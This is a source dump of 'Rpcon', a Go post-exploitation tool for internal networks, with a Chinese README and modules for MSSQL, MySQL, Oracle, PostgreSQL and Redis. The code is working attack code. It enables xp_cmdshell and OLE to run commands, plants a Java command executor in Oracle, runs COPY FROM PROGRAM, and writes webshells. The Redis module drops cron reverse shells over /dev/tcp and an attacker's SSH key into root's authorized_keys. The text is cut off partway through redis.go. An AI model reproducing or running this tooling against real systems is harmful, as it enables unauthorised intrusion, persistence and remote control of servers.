├── README.md ├── cmd ├── mssql.go ├── mysql.go ├── oracle.go ├── postgresql.go ├── redis.go ├── run.go ├── smb.go ├── ssh.go └── wmiex.go ├── common ├── config.go ├── flag.go └── parse.go ├── go.mod ├── go.sum ├── main.go └── pkg ├── PrintRow.go ├── log.go ├── readfile.go └── wmiexec.go /README.md: -------------------------------------------------------------------------------- 1 | # Rpcon 2 | 3 | 内网远程连接利用工具,用于ssh smb 等常规服务Cancel changes 4 | 5 | 目前支持ssh远程连接执行命令 6 | 7 | ## 2023.3.24更新: 8 | 9 | redis远程连接执行命令 redis一键写入webshell,一键反弹shell,一键写入公钥 10 | 11 | ## 2023.3.26更新: 12 | 13 | mysql远程连接执行命令 mysql一键写入webshell 14 | 15 | ## 2023.3.27更新: 16 | 17 | wmiexec无回显命令执行 18 | 19 | ## 2023.3.28更新: 20 | 21 | 优化某些代码 22 | 23 | mssql模块 24 | 25 | 1:xcmdhshell 一键利用 26 | 27 | 2:OLE一键利用 28 | 29 | ## 2023.3.29更新: 30 | 31 | oracle利用模块:shellrun函数执行系统命令 32 | 33 | 关于oracle模块报错 34 | 35 | ## 2023.3.30更新: 36 | 37 | 暂时移除oracle 使用可以从cmd/oracle.go import包中去除//再按照上文参考配置 38 | 39 | Postgersql模块 40 | 41 | 1:一键写入webshell 42 | 43 | 2:命令执行 44 | 45 | Smb模块 46 | ## 2023.4.4更新 47 | 解决linux打包问题 48 | 49 | 50 | 51 | 使用方法: 52 | 53 | ``` 54 | 写入shell默认为 55 | -p 指定端口 56 | -f 指定文件 列入shell文件 57 | -pt 写入目录 58 | -u 用户 59 | -pw 密码 60 | -d 指定数据库名称 61 | -c 执行的命令或者数据库语法 62 | 63 | mysql: 64 | 执行查询 65 | rpcon -u root -pw root -m mysql -c "show databases;" 66 | 一键写shell: 67 | rpcon -u root -pw root -r mysl -f sss/1.php -pt /var/html/www 68 | 一键读取配置 69 | rpcon -u root -pw root -r mycg 70 | 71 | redis: 72 | 执行查询 73 | rpcon -u -pw -m redis -c "" 74 | 一键写入公钥 75 | rpcon -u -pw -r rk -pt rsa.xx 76 | 一键写入shell 77 | rpcon -u -pw -r rs -f 11.php -pt 目标目录 78 | 一键反弹shell <有点鸡肋某些情况会反弹失败> 79 | rpcon -u -pw -r rn -ws 8.8.8.8 -wp 666 80 | 81 | 82 | mssql 83 | 执行查询: 84 | rpcon -u sa -pw sa -m mssql -c "" 85 | 读取配置: 86 | rpcon -u sa -pw sa -r mssg 87 | 执行命令 88 | rpcon -u sa -pw sa -r cmdshell -c whoami 89 | rpcon -u sa -pw sa -r oleshell -c whoami 90 | 91 | oracle: 92 | 执行查询: 93 | rpcon -u sys -pw sys -m oracle -c "" 94 | 读取配置 95 | rpcon -u sys -pw sys -r org 96 | 执行命令 97 | rpcon -u sys -pw sys -r ors -c whoami 98 | 99 | postgresql 100 | 执行查询: 101 | rpcon -u postgres -pw 123456 -m postgres -c "" 102 | 读取配置 103 | rpcon -u postgres -pw 123456 -r pocfg 104 | 写入shell 105 | rpcon -u postgres -pw 123456 -r poshell -f 11.php -pt /var/html/www 106 | 执行命令 107 | rpcon -u postgres -pw 123456 -r pocde -c whoami 108 | 109 | 110 | wmicexec: 111 | rpcon -u administratros -pw 123456 -m wmi -c 112 | hash: 113 | rpcon -u administrators -hash aaaaaaaaa -m wmi -c 114 | 115 | smb: 116 | rpcon -u administrators -pw 123456 -f 文件 -pt 目录 117 | hash: 118 | rpcon -u administrators -hash aaaaaaaaa -f 文件 -pt 目录 119 | ``` 120 | 121 | -------------------------------------------------------------------------------- /cmd/mssql.go: -------------------------------------------------------------------------------- 1 | package cmdpackage 2 | 3 | import ( 4 | "Rpcon/common" 5 | "Rpcon/pkg" 6 | "database/sql" 7 | "fmt" 8 | _ "github.com/denisenkom/go-mssqldb" 9 | "log" 10 | ) 11 | 12 | var cfgquery = []string{"select @@VERSION", 13 | "SELECT name FROM MASter..SysDatabASes ORDER BY name", 14 | "select IS_SRVROLEMEMBER('sysadmin')", 15 | "select IS_MEMBER('db_owner')", 16 | "select is_srvrolemember('public')", 17 | "SELECT SysObjects.name AS Tablename FROM sysobjects WHERE xtype = 'U' and sysstat<200", 18 | "select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'", //查看cmdshell状态 19 | "select count(*) from master.dbo.sysobjects where xtype='x' and name='SP_OACREATE';", //查看sp_oacreate状态 1存在 20 | } 21 | var msexp = []string{ 22 | ";EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--", //开启cmdshell 23 | "exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'Ole Automation Procedures',1;reconfigure;--", //开启OLE 无回显 24 | } 25 | 26 | func Msscon() (*sql.DB, error) { 27 | dns := fmt.Sprintf("server=%s;port%d;database=%s;user id=%s;password=%s;encrypt=disable", common.Host, common.Port, common.DBname, common.User, common.Password) 28 | if isdebug { 29 | fmt.Println(dns) 30 | } 31 | conn, err := sql.Open("mssql", dns) 32 | if err != nil { 33 | log.Fatal("Open Connection failed:", err.Error()) 34 | } 35 | return conn, err 36 | } 37 | 38 | func Mssquery() { 39 | conn, _ := Msscon() 40 | stmt, err := conn.Prepare(common.Code) 41 | if err != nil { 42 | log.Fatal("Prepare failed:", err.Error()) 43 | } 44 | defer stmt.Close() 45 | //通过Statement执行查询 46 | rows, err := stmt.Query() 47 | if err != nil { 48 | log.Fatal("Query failed:", err.Error()) 49 | } 50 | 51 | //建立一个列数组 52 | cols, err := rows.Columns() 53 | var colsdata = make([]interface{}, len(cols)) 54 | for i := 0; i < len(cols); i++ { 55 | colsdata[i] = new(interface{}) 56 | fmt.Print(cols[i]) 57 | fmt.Print("\t") 58 | } 59 | fmt.Println() 60 | 61 | //遍历每一行 62 | for rows.Next() { 63 | rows.Scan(colsdata...) //将查到的数据写入到这行中 64 | pkg.PrintRow(colsdata) //打印此行 65 | } 66 | defer rows.Close() 67 | defer func() { defer conn.Close() }() 68 | } 69 | 70 | func Msscfg() { 71 | conn, _ := Msscon() 72 | for i := range cfgquery { 73 | stmt, err := conn.Prepare(cfgquery[i]) 74 | if err != nil { 75 | log.Fatal("Prepare failed:", err.Error()) 76 | } 77 | defer stmt.Close() 78 | //通过Statement执行查询 79 | rows, err := stmt.Query() 80 | if err != nil { 81 | log.Fatal("Query failed:", err.Error()) 82 | } 83 | 84 | //建立一个列数组 85 | cols, err := rows.Columns() 86 | var colsdata = make([]interface{}, len(cols)) 87 | for i := 0; i < len(cols); i++ { 88 | colsdata[i] = new(interface{}) 89 | fmt.Print(cols[i]) 90 | fmt.Print("\t") 91 | } 92 | fmt.Println() 93 | 94 | //遍历每一行 95 | for rows.Next() { 96 | rows.Scan(colsdata...) //将查到的数据写入到这行中 97 | pkg.PrintRow(colsdata) //打印此行 98 | } 99 | defer rows.Close() 100 | } 101 | defer func() { conn.Close() }() 102 | } 103 | 104 | func Cmdshell() { 105 | conn, err := Msscon() 106 | if err != nil { 107 | fmt.Println(err) 108 | } 109 | conn.Query(";EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--") 110 | Code := fmt.Sprintf("exec master..xp_cmdshell '%v'", common.Code) 111 | stmt, err := conn.Prepare(Code) 112 | if err != nil { 113 | log.Fatal("Prepare failed:", err.Error()) 114 | } 115 | defer stmt.Close() 116 | //通过Statement执行查询 117 | rows, err := stmt.Query() 118 | if err != nil { 119 | log.Fatal("Query failed:", err.Error()) 120 | } 121 | 122 | //建立一个列数组 123 | cols, err := rows.Columns() 124 | var colsdata = make([]interface{}, len(cols)) 125 | for i := 0; i < len(cols); i++ { 126 | colsdata[i] = new(interface{}) 127 | fmt.Print(cols[i]) 128 | fmt.Print("\t") 129 | } 130 | fmt.Println() 131 | 132 | //遍历每一行 133 | for rows.Next() { 134 | rows.Scan(colsdata...) //将查到的数据写入到这行中 135 | pkg.PrintRow(colsdata) //打印此行 136 | } 137 | defer rows.Close() 138 | defer func() { conn.Close() }() 139 | } 140 | 141 | func Oleshell() { 142 | conn, err := Msscon() 143 | if err != nil { 144 | fmt.Println(err) 145 | } 146 | conn.Query("exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'Ole Automation Procedures',1;reconfigure;--") 147 | Code := fmt.Sprintf("declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\\windows\\system32\\cmd.exe /c %v >c:\\\\1.txt'", common.Code) 148 | stmt, err := conn.Prepare(Code) 149 | if err != nil { 150 | log.Fatal("Prepare failed:", err.Error()) 151 | } 152 | defer stmt.Close() 153 | //通过Statement执行查询 154 | rows, err := stmt.Query() 155 | if err != nil { 156 | log.Fatal("Query failed:", err.Error()) 157 | } 158 | 159 | //建立一个列数组 160 | cols, err := rows.Columns() 161 | var colsdata = make([]interface{}, len(cols)) 162 | for i := 0; i < len(cols); i++ { 163 | colsdata[i] = new(interface{}) 164 | fmt.Print(cols[i]) 165 | fmt.Print("\t") 166 | } 167 | fmt.Println() 168 | 169 | //遍历每一行 170 | for rows.Next() { 171 | rows.Scan(colsdata...) //将查到的数据写入到这行中 172 | pkg.PrintRow(colsdata) //打印此行 173 | } 174 | defer rows.Close() 175 | defer func() { conn.Close() }() 176 | } 177 | 178 | func CLR() { 179 | conn, _ := Msscon() 180 | conn.Query("exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'Ole Automation Procedures',1;reconfigure;--") 181 | 182 | } 183 | -------------------------------------------------------------------------------- /cmd/mysql.go: -------------------------------------------------------------------------------- 1 | package cmdpackage 2 | 3 | import ( 4 | "Rpcon/common" 5 | "Rpcon/pkg" 6 | "database/sql" 7 | "fmt" 8 | _ "github.com/go-sql-driver/mysql" 9 | "log" 10 | ) 11 | 12 | var ( 13 | mysqread = []string{"SELECT LOAD_FILE('/etc/passwd')", "select user()", "show variables like '%plugins%' ;", "select @@version_compile_os", "SELECT LOAD_FILE('/etc/nginx/nginx.conf' )", "show global variables like 'secure%';", "show variables like '%general%';"} 14 | isdebug = true 15 | key string 16 | aaa string 17 | ) 18 | 19 | func mysqlcmd() (*sql.DB, error) { 20 | dns := fmt.Sprintf("%v:%v@(%v:%v)/%v", common.User, common.Password, common.Host, common.Port, common.DBname) 21 | if isdebug { 22 | 23 | } 24 | db, err := sql.Open("mysql", dns) 25 | if err != nil { 26 | log.Fatal("Open Connection failed:", err.Error()) 27 | } 28 | db.SetMaxOpenConns(20) 29 | db.SetMaxIdleConns(10) 30 | return db, err 31 | } 32 | 33 | func Query() { 34 | 35 | db, _ := mysqlcmd() 36 | db.Ping() 37 | if common.Code != "" { 38 | stmt, err := db.Prepare(common.Code) 39 | if err != nil { 40 | log.Fatal("Prepare failed:", err.Error()) 41 | } 42 | defer stmt.Close() 43 | //通过Statement执行查询 44 | rows, err := stmt.Query() 45 | if err != nil { 46 | log.Fatal("Query failed:", err.Error()) 47 | } 48 | 49 | //建立一个列数组 50 | cols, err := rows.Columns() 51 | var colsdata = make([]interface{}, len(cols)) 52 | for i := 0; i < len(cols); i++ { 53 | colsdata[i] = new(interface{}) 54 | fmt.Print(cols[i]) 55 | fmt.Print("\t") 56 | } 57 | fmt.Println() 58 | 59 | //遍历每一行 60 | for rows.Next() { 61 | rows.Scan(colsdata...) //将查到的数据写入到这行中 62 | pkg.PrintRow(colsdata) //打印此行 63 | } 64 | defer rows.Close() 65 | defer func() { db.Close() }() 66 | } 67 | } 68 | 69 | func Mysqlshell() { 70 | db, err := mysqlcmd() 71 | if common.File != "" { 72 | key, err = pkg.Readfile(common.File) 73 | if err != nil { 74 | fmt.Println("打开文件失败") 75 | } 76 | } else { 77 | key = "" 78 | } 79 | path := fmt.Sprintf("select '%s' into outfile '%s';", key, common.Path) 80 | ss, err := db.Query(path) 81 | if err != nil { 82 | fmt.Println("写入shell失败,目标没有写入权限或者文件名相同 请重新确认文件名和路径") 83 | } else { 84 | log.Println("写入shell成功") 85 | } 86 | for ss.Next() { 87 | err := ss.Scan(&aaa) 88 | if err != nil { 89 | log.Println(err) 90 | } 91 | log.Println("写入shell成功") 92 | } 93 | defer func() { db.Close() }() 94 | } 95 | 96 | func Myconfig() { 97 | db, _ := mysqlcmd() 98 | for i, _ := range mysqread { 99 | stmt, err := db.Prepare(mysqread[i]) 100 | if err != nil { 101 | log.Fatal("Prepare failed:", err.Error()) 102 | } 103 | defer stmt.Close() 104 | //通过Statement执行查询 105 | rows, err := stmt.Query() 106 | if err != nil { 107 | log.Fatal("Query failed:", err.Error()) 108 | } 109 | 110 | //建立一个列数组 111 | cols, err := rows.Columns() 112 | var colsdata = make([]interface{}, len(cols)) 113 | for i := 0; i < len(cols); i++ { 114 | colsdata[i] = new(interface{}) 115 | fmt.Print(cols[i]) 116 | fmt.Print("\t") 117 | } 118 | fmt.Println() 119 | 120 | //遍历每一行 121 | for rows.Next() { 122 | rows.Scan(colsdata...) //将查到的数据写入到这行中 123 | pkg.PrintRow(colsdata) //打印此行 124 | } 125 | defer rows.Close() 126 | } 127 | defer func() { db.Close() }() 128 | } 129 | -------------------------------------------------------------------------------- /cmd/oracle.go: -------------------------------------------------------------------------------- 1 | package cmdpackage 2 | 3 | import ( 4 | "Rpcon/common" 5 | "Rpcon/pkg" 6 | "database/sql" 7 | "fmt" 8 | _ "github.com/sijms/go-ora/v2" 9 | "log" 10 | ) 11 | 12 | //https://www.cnblogs.com/jiangyuqin/p/10135963.html 13 | var cfg = []string{ 14 | "SELECT * FROM session_privs;\n", 15 | "SELECT * FROM session_privs;\n", 16 | "SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';\n", //查询数据库版本信息 17 | "SELECT banner FROM v$version where banner like 'TNS%';\n", //查询操作系统版本 18 | "SELECT UTL_INADDR.get_host_name FROM dual;\n", //查询主机名 19 | "SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES';\n", //查询所有dba用户 20 | } 21 | 22 | var exp = []string{`create or replace and resolve java source named "JavaUtil" as 23 | import java.io.*; 24 | public class JavaUtil extends Object 25 | { 26 | public static String ExecCommand(String cmd) 27 | { 28 | try { 29 | BufferedReader myReader= new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream())); 30 | String stemp,str = ""; 31 | while ((stemp = myReader.readLine()) != null) str += stemp + "\n"; 32 | myReader.close(); 33 | return str; 34 | } catch (Exception e){ 35 | return e.toString(); 36 | } 37 | } 38 | } 39 | `, 40 | `create or replace function ExecCommand(cmd in varchar2) return varchar2 41 | as 42 | language java 43 | name 'JavaUtil.ExecCommand(java.lang.String) return String'; 44 | `, 45 | } 46 | 47 | func Orconn() (*sql.DB, error) { 48 | if common.DBname == "" { 49 | common.DBname = "orcl" 50 | dns := fmt.Sprintf("oracle://%s:%s@%s:%v/%s", common.User, common.Password, common.Host, common.Port) 51 | fmt.Println(dns) 52 | conn, err := sql.Open("oracle", dns) 53 | if err != nil { 54 | log.Fatal("Open Connection failed:", err.Error()) 55 | } 56 | return conn, err 57 | } else { 58 | dns := fmt.Sprintf("oracle://%s:%s@%s:%v/%s", common.User, common.Password, common.Host, common.Port, common.DBname) 59 | fmt.Println(dns) 60 | conn, err := sql.Open("oracle", dns) 61 | if err != nil { 62 | log.Fatal("Open Connection failed:", err.Error()) 63 | } 64 | return conn, err 65 | } 66 | } 67 | 68 | func ORquery() { 69 | conn, _ := Orconn() 70 | stmt, err := conn.Prepare(common.Code) 71 | rows, err := stmt.Query() 72 | if err != nil { 73 | log.Fatal("Query failed:", err.Error()) 74 | } 75 | 76 | //建立一个列数组 77 | cols, err := rows.Columns() 78 | var colsdata = make([]interface{}, len(cols)) 79 | for i := 0; i < len(cols); i++ { 80 | colsdata[i] = new(interface{}) 81 | fmt.Print(cols[i]) 82 | fmt.Print("\t") 83 | } 84 | fmt.Println() 85 | 86 | //遍历每一行 87 | for rows.Next() { 88 | rows.Scan(colsdata...) //将查到的数据写入到这行中 89 | pkg.PrintRow(colsdata) //打印此行 90 | } 91 | defer rows.Close() 92 | defer func() { conn.Close() }() 93 | } 94 | 95 | func ORcfg() { 96 | conn, _ := Orconn() 97 | for i := range cfg { 98 | stmt, err := conn.Prepare(cfg[i]) 99 | if err != nil { 100 | log.Fatal("Prepare failed:", err.Error()) 101 | } 102 | //通过Statement执行查询 103 | rows, err := stmt.Query() 104 | if err != nil { 105 | log.Fatal("Query failed:", err.Error()) 106 | } 107 | 108 | //建立一个列数组 109 | cols, err := rows.Columns() 110 | var colsdata = make([]interface{}, len(cols)) 111 | for i := 0; i < len(cols); i++ { 112 | colsdata[i] = new(interface{}) 113 | fmt.Print(cols[i]) 114 | fmt.Print("\t") 115 | } 116 | fmt.Println() 117 | 118 | //遍历每一行 119 | for rows.Next() { 120 | rows.Scan(colsdata...) //将查到的数据写入到这行中 121 | pkg.PrintRow(colsdata) //打印此行 122 | } 123 | } 124 | defer func() { conn.Close() }() 125 | } 126 | 127 | func ORacleshell() { 128 | conn, err := Orconn() 129 | if err != nil { 130 | log.Println(err) 131 | } 132 | for i := range exp { 133 | a, err := conn.Prepare(exp[i]) 134 | if err != nil { 135 | log.Print("提权失败") 136 | log.Print("1") 137 | log.Print(err) 138 | } 139 | _, err = a.Query() 140 | if err != nil { 141 | log.Print("提权失败") 142 | log.Print(err) 143 | } 144 | } 145 | ORcleCode := fmt.Sprintf(`select ExecCommand('%s') from dual`, common.Code) 146 | stmt, err := conn.Prepare(ORcleCode) 147 | if err != nil { 148 | log.Fatal("Prepare failed:", err.Error()) 149 | } 150 | defer stmt.Close() 151 | //通过Statement执行查询 152 | rows, err := stmt.Query() 153 | if err != nil { 154 | log.Fatal("Query failed:", err.Error()) 155 | } 156 | 157 | //建立一个列数组 158 | cols, err := rows.Columns() 159 | var colsdata = make([]interface{}, len(cols)) 160 | for i := 0; i < len(cols); i++ { 161 | colsdata[i] = new(interface{}) 162 | fmt.Print(cols[i]) 163 | fmt.Print("\t") 164 | } 165 | fmt.Println() 166 | 167 | //遍历每一行 168 | for rows.Next() { 169 | rows.Scan(colsdata...) //将查到的数据写入到这行中 170 | pkg.PrintRow(colsdata) //打印此行 171 | } 172 | defer rows.Close() 173 | defer func() { conn.Close() }() 174 | } 175 | -------------------------------------------------------------------------------- /cmd/postgresql.go: -------------------------------------------------------------------------------- 1 | package cmdpackage 2 | 3 | import ( 4 | "Rpcon/common" 5 | "Rpcon/pkg" 6 | "database/sql" 7 | "fmt" 8 | _ "github.com/lib/pq" 9 | "log" 10 | "os" 11 | ) 12 | 13 | var shell string 14 | 15 | var pocfg = []string{"select version();", 16 | "SELECT current_setting('server_version_num');", 17 | "SELECT current_setting('is_superuser');", 18 | //"postgres=# \\du", 19 | //"SELECT usename, passwd FROM pg_shadow;\n", 20 | // "copy (select '') to '/tmp/1.php';", 21 | "select setting from pg_settings where name='config_file'", 22 | "select setting from pg_settings where name = 'data_directory';", 23 | // "select/**/PG_READ_FILE($$/etc/passwd$$)", 24 | //"DROP TABLE IF EXISTS cmd_exec;", 25 | //"CREATE TABLE cmd_exec(cmd_output text);", 26 | //"copy cmd_exec FROM PROGRAM 'whoami';", 27 | //"SELECT * FROM cmd_exec;", 28 | } 29 | 30 | func Postconn() (*sql.DB, error) { 31 | pdqlInfo := fmt.Sprintf("host=%s port=%d user=%s "+"password=%s dbname=%s", common.Host, common.Port, common.User, common.Password, common.DBname) 32 | db, err := sql.Open("postgres", pdqlInfo) 33 | if err != nil { 34 | log.Println("Open Connection failed:", err.Error()) 35 | os.Exit(0) 36 | } 37 | //db.SetMaxOpenConns(20) //设置数据库连接池最大连接数 38 | //db.SetMaxIdleConns(10) //设置最大空闲连接数 39 | //defer db.Close() 40 | return db, err 41 | } 42 | 43 | func Powriteshell() { 44 | conn, err := Postconn() 45 | if common.File != "" { 46 | shell, err = pkg.Readfile(common.File) 47 | if err != nil { 48 | log.Println("打开文件失败") 49 | } 50 | } else { 51 | shell = "" 52 | } 53 | webshell := fmt.Sprintf("copy (select '%s') to '%s';", shell, common.Path) 54 | _, err = conn.Query(webshell) 55 | if err != nil { 56 | log.Println("写入shell失败", err) 57 | } else { 58 | log.Println("写入shell成功") 59 | } 60 | } 61 | 62 | func Pocode() { 63 | conn, _ := Postconn() 64 | //通过Statement执行查询 65 | code := fmt.Sprintf("copy cmd_exec FROM PROGRAM '%s';", common.Code) 66 | conn.Query("DROP TABLE IF EXISTS cmd_exec;") 67 | conn.Query("CREATE TABLE cmd_exec(cmd_output text);") 68 | conn.Query(code) 69 | 70 | rows, err := conn.Query("SELECT * FROM cmd_exec;") 71 | if err != nil { 72 | log.Fatal("Query failed:", err.Error()) 73 | } 74 | 75 | //建立一个列数组 76 | cols, err := rows.Columns() 77 | var colsdata = make([]interface{}, len(cols)) 78 | for i := 0; i < len(cols); i++ { 79 | colsdata[i] = new(interface{}) 80 | //fmt.Print(cols[i]) 81 | fmt.Print("\t") 82 | } 83 | fmt.Println() 84 | 85 | //遍历每一行 86 | for rows.Next() { 87 | rows.Scan(colsdata...) //将查到的数据写入到这行中 88 | pkg.PrintRow(colsdata) //打印此行 89 | } 90 | defer rows.Close() 91 | defer conn.Close() 92 | 93 | } 94 | 95 | func PoQuery() { 96 | conn, _ := Postconn() 97 | stmt, err := conn.Prepare(common.Code) 98 | if err != nil { 99 | log.Fatal("Prepare failed:", err.Error()) 100 | } 101 | defer stmt.Close() 102 | //通过Statement执行查询 103 | rows, err := stmt.Query() 104 | if err != nil { 105 | log.Fatal("Query failed:", err.Error()) 106 | } 107 | 108 | //建立一个列数组 109 | cols, err := rows.Columns() 110 | var colsdata = make([]interface{}, len(cols)) 111 | for i := 0; i < len(cols); i++ { 112 | colsdata[i] = new(interface{}) 113 | fmt.Print(cols[i]) 114 | fmt.Print("\t") 115 | } 116 | fmt.Println() 117 | 118 | //遍历每一行 119 | for rows.Next() { 120 | rows.Scan(colsdata...) //将查到的数据写入到这行中 121 | pkg.PrintRow(colsdata) //打印此行 122 | } 123 | defer rows.Close() 124 | } 125 | 126 | func Pocfg() { 127 | conn, err := Postconn() 128 | if err != nil { 129 | fmt.Println(err) 130 | } 131 | for i := range pocfg { 132 | rows, err := conn.Query(pocfg[i]) 133 | if err != nil { 134 | log.Fatal("Query failed:", err.Error()) 135 | } 136 | 137 | //建立一个列数组 138 | cols, err := rows.Columns() 139 | var colsdata = make([]interface{}, len(cols)) 140 | for i := 0; i < len(cols); i++ { 141 | colsdata[i] = new(interface{}) 142 | fmt.Print(cols[i]) 143 | //fmt.Print("\t") 144 | } 145 | fmt.Println() 146 | 147 | //遍历每一行 148 | for rows.Next() { 149 | rows.Scan(colsdata...) //将查到的数据写入到这行中 150 | pkg.PrintRow(colsdata) //打印此行 151 | } 152 | defer rows.Close() 153 | defer conn.Close() 154 | } 155 | } 156 | -------------------------------------------------------------------------------- /cmd/redis.go: -------------------------------------------------------------------------------- 1 | package cmdpackage 2 | 3 | import ( 4 | "Rpcon/common" 5 | "Rpcon/pkg" 6 | "bufio" 7 | "context" 8 | "fmt" 9 | "github.com/go-redis/redis/v8" 10 | "os" 11 | "strconv" 12 | "strings" 13 | ) 14 | 15 | var s string 16 | 17 | func con() (*redis.Client, context.Context) { 18 | 19 | // 快速入门: 20 | // 连接、执行命令 21 | ctx := context.Background() 22 | ctx.Done() 23 | 24 | rdb := redis.NewClient(&redis.Options{ 25 | Addr: common.Host + ":" + strconv.Itoa(common.Port), 26 | Username: "", 27 | Password: common.Password, 28 | DB: 0, 29 | }) 30 | // Redis 31 | return rdb, ctx 32 | 33 | } 34 | 35 | func Codes() { 36 | rdb, ctx := con() 37 | fmt.Println(rdb.String()) 38 | ss := strings.Fields(common.Code) 39 | switch len(ss) { 40 | case 7: 41 | val2, err := rdb.Do(ctx, ss[0], ss[1], ss[2], ss[3], ss[4], ss[5], ss[6]).Result() 42 | if err == redis.Nil { 43 | fmt.Println("command not found") 44 | } else { 45 | fmt.Println(val2) 46 | } 47 | if val2 == nil { 48 | return 49 | } 50 | case 6: 51 | val2, err := rdb.Do(ctx, ss[0], ss[1], ss[2], ss[3], ss[4], ss[5]).Result() 52 | if err == redis.Nil { 53 | fmt.Println("command not found") 54 | } else { 55 | fmt.Println(val2) 56 | } 57 | if val2 == nil { 58 | return 59 | } 60 | case 5: 61 | val2, err := rdb.Do(ctx, ss[0], ss[1], ss[2], ss[3], ss[4]).Result() 62 | if err == redis.Nil { 63 | fmt.Println("command not found") 64 | } else { 65 | fmt.Println(val2) 66 | } 67 | if val2 == nil { 68 | return 69 | } 70 | case 4: 71 | val2, err := rdb.Do(ctx, ss[0], ss[1], ss[2], ss[3]).Result() 72 | if err == redis.Nil { 73 | fmt.Println("command not found") 74 | } else { 75 | fmt.Println(val2) 76 | } 77 | if val2 == nil { 78 | return 79 | } 80 | case 3: 81 | val2, err := rdb.Do(ctx, ss[0], ss[1], ss[2]).Result() 82 | if err == redis.Nil { 83 | fmt.Println("command not found") 84 | } else { 85 | fmt.Println(val2) 86 | } 87 | 88 | case 2: 89 | val2, err := rdb.Do(ctx, ss[0], ss[1]).Result() 90 | if err == redis.Nil { 91 | fmt.Println("command not found") 92 | } else { 93 | fmt.Println(val2) 94 | } 95 | if val2 == nil { 96 | return 97 | } 98 | case 1: 99 | val2, err := rdb.Do(ctx, ss[0]).Result() 100 | if err == redis.Nil { 101 | fmt.Println("command not found") 102 | } else { 103 | fmt.Println(val2) 104 | } 105 | if val2 == nil { 106 | return 107 | } 108 | case 0: 109 | return 110 | } 111 | } 112 | 113 | func Wshell() { 114 | rdb, ctx := con() 115 | // Redis 116 | val2 := rdb.Do(ctx, "config", "set", "dir", common.Path).String() 117 | fmt.Println("\n" + val2) 118 | if strings.Contains(val2, "OK") { 119 | val3 := rdb.Do(ctx, "config", "set", "dbfilename", "shell.php").String() 120 | fmt.Printf("\n" + val3) 121 | if strings.Contains(val3, "OK") { 122 | if common.File != "" { 123 | s, _ = pkg.Readfile(common.File) 124 | s = fmt.Sprintf("\r\n\r\n%s\r\n\r\n", common.File) 125 | } else { 126 | s = "\r\n\r\n\r\n\r\n" 127 | } 128 | val4 := rdb.Do(ctx, "set", "xxx", s).String() 129 | fmt.Println("\n" + val4) 130 | if strings.Contains(val4, "OK") { 131 | _, err := rdb.Do(ctx, "save").Result() 132 | if err != nil { 133 | fmt.Println("\n写入shell失败") 134 | } 135 | } else { 136 | fmt.Println("\n写入shell失败") 137 | } 138 | } else { 139 | fmt.Println("\n写入shell失败") 140 | } 141 | } 142 | } 143 | 144 | func ncshell() { 145 | ubuntu() 146 | censell() 147 | } 148 | 149 | func ubuntu() { 150 | rdb, ctx := con() 151 | exp := fmt.Sprintf("\n\n*/1 * * * * /bin/bash -i >&/dev/tcp/%v/%v 0>&1\n\n", common.Wshell, common.Wport) 152 | val2 := rdb.Do(ctx, "set", "xxxxxxxxxzzzzzzzzz", exp).String() 153 | fmt.Println(val2) 154 | if strings.Contains(val2, "OK") { 155 | val3 := rdb.Do(ctx, "config", "set", "dir", "/var/spool/cron/crontabs/").String() 156 | fmt.Println(val3) 157 | if strings.Contains(val3, "OK") { 158 | val4 := rdb.Do(ctx, "config", "set", "dbfilename", "root").String() 159 | fmt.Println(val4) 160 | if strings.Contains(val4, "OK") { 161 | _, err := rdb.Do(ctx, "save").Result() 162 | if err != nil { 163 | fmt.Println("写入计划任务失败") 164 | } 165 | } 166 | } else { 167 | fmt.Println("写入计划任务失败") 168 | } 169 | } else { 170 | fmt.Println("写入计划任务失败") 171 | } 172 | } 173 | 174 | func censell() { 175 | rdb, ctx := con() 176 | exp := fmt.Sprintf("\n\n* * * * * /bin/bash -i >&/dev/tcp/%v/%v 0>&1\n\n", common.Wshell, common.Wport) 177 | val2 := rdb.Do(ctx, "set", "xxxzzzzzzzzzzzzzzzzzzzzzzzzz", exp).String() 178 | fmt.Println(val2) 179 | if strings.Contains(val2, "OK") { 180 | val3 := rdb.Do(ctx, "config", "set", "dir", "/var/spool/cron/").String() 181 | fmt.Println(val3) 182 | if strings.Contains(val3, "OK") { 183 | val4 := rdb.Do(ctx, "config", "set", "dbfilename", "root").String() 184 | fmt.Println(val4) 185 | if strings.Contains(val4, "OK") { 186 | _, err := rdb.Do(ctx, "save").Result() 187 | if err != nil { 188 | fmt.Println("写入计划任务失败") 189 | } 190 | } 191 | } else { 192 | fmt.Println("写入计划任务失败") 193 | } 194 | } else { 195 | fmt.Println("写入计划任务失败") 196 | } 197 | } 198 | 199 | func Wkey() { 200 | rdb, ctx := con() 201 | key, err := readfile(common.Path) 202 | if err != nil { 203 | text := fmt.Sprintf("the key file %s is emty", common.Path) 204 | fmt.Println(text) 205 | } 206 | if len(key) == 0 { 207 | text := fmt.Sprintf("the keyfile %s is empty", common.Path) 208 | fmt.Println(text) 209 | } 210 | exp := fmt.Sprintf("\n\n%v\n\n", key) 211 | xx := rdb.Do(ctx, "set", "x", exp).String() 212 | fmt.Println(xx) 213 | if strings.Contains(xx, "OK") { 214 | xx1 := rdb.Do(ctx, "config", "set", "dir", "/root/.ssh").String() 215 | fmt.Println(xx1) 216 | if strings.Contains(xx1, "OK") { 217 | xx2 := rdb.Do(ctx, "config", "set", "dbfilename", "authorized_keys").String() 218 | fmt.Println(xx2) 219 | if strings.Contains(xx2, "OK") { 220 | xx3 := rdb.Do(ctx, "save") 221 | fmt.Println(xx3) 222 | } 223 | } 224 | } 225 | 226 | } 227 | 228 | func readfile(string) (string, error) { 229 | file, err := os.Open(common.Path) 230 | if err != nil { 231 | return "", err 232 | } 233 | defer file.Close() 234 | scanner := bufio.NewScanner(file) 235 | for scanner.Scan() { 236 | text := strings.TrimSpace(scanner.Text()) 237 | if text != "" { 238 